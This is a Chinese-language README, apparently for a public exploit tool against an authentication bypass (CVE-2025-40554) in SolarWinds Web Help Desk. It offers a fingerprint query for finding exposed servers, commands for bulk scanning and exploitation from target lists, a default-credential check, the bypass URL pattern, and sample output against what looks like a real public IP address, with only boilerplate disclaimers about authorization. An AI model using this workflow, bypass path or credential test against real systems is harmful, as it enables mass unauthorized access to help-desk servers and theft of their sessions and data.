一个用于检测和利用 SolarWinds Web Help Desk 中认证绕过漏洞(CVE-2025-40554 / CVE-2025-40536)的综合安全测试工具。
仅供教育及授权安全测试使用
本工具仅用于对您拥有或已获得明确书面授权的系统进行安全研究、渗透测试和漏洞评估。未经授权访问计算机系统是违法的。作者不对因使用本工具造成的误用或损害负责。
CVE-2025-40554 是 SolarWinds Web Help Desk 中的一个严重认证绕过漏洞,允许未认证的攻击者:
自行探索 :))
依赖项:
# 克隆或下载脚本
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# 赋予执行权限
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# 简单漏洞检查
python3 CVE-2025-40554.py -t https://target:8443
# 显式指定协议
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# 完整利用并枚举会话
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# 跳过默认凭据测试
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# 从文件扫描多个目标
python3 CVE-2025-40554.py -l targets.txt
# 批量扫描并利用
python3 CVE-2025-40554.py -l targets.txt --exploit
# 静默模式(最小输出)
python3 CVE-2025-40554.py -l targets.txt -q
# 自定义输出文件
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# 支持注释
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ 认证绕过利用工具 ║
║ 仅用于研究与教育目的 ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
目标: https://203.106.221.203:8443
======================================================================
[*] 步骤 1: 建立会话...
[+] 提取到 WOSID: AbCdEfGhIjKlMnOpQrStU
[+] XSRF 令牌: abc123-def456-ghi789
[*] 步骤 2: 测试认证绕过...
[+] 发现绕过指示器: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] 存在漏洞 - 已确认认证绕过!
[*] 步骤 3: 测试默认凭据 (client/client)...
[+] 成功 - 默认凭据有效!
======================================================================
利用模式 - CVE-2025-40554 认证绕过
======================================================================
[*] 绕过 URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] 触发认证绕过...
[+] 认证绕过成功!
[*] 会话 Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
摘要
======================================================================
[+] 目标存在 CVE-2025-40554 漏洞
[+] 默认凭据: 有效
======================================================================
[*] 从 targets.txt 加载了 5 个唯一目标
[*] 模式: 绕过 + 默认凭据测试
[*] 完整利用已启用
[1/5] 测试 https://target1:8443
[+] 存在漏洞 - 已确认认证绕过!
[+] 成功 - 默认凭据有效!
[2/5] 测试 https://target2:8443
[!] 无漏洞 - 认证绕过失败
...
======================================================================
扫描摘要
======================================================================
总计扫描: 5/5
存在漏洞: 2
存在默认凭据: 1
======================================================================
[+] 结果已保存至: vulnerable_targets.txt
会话建立
认证绕过
凭据测试(可选)
完整利用(--exploit 模式)
该工具通过检查以下内容来检测是否成功绕过:
externalAuthContainer - 外部认证配置JSONRpcClient - API 客户端暴露SAML 2.0 - SSO 配置LoginPref - 登录偏好设置authMode - 认证模式设置欢迎贡献……
本工具按“现状”提供,不附带任何形式的明示或暗示保证。使用风险自负。
Skynoxk
请记住:始终以合乎道德和法律的方式进行黑客攻击。未经授权访问是犯罪行为。
| 选项 | 描述 |
|---|
-t, --target URL | 要测试的单个目标 URL |
-l, --list FILE | 包含目标列表的文件(每行一个) |
--exploit | 启用完整利用模式并枚举 |
--no-login | 跳过默认凭据测试 |
-o, --output FILE | 易受攻击目标的输出文件(默认:vulnerable_targets.txt) |
-q, --quiet | 最小输出模式(适用于批量扫描) |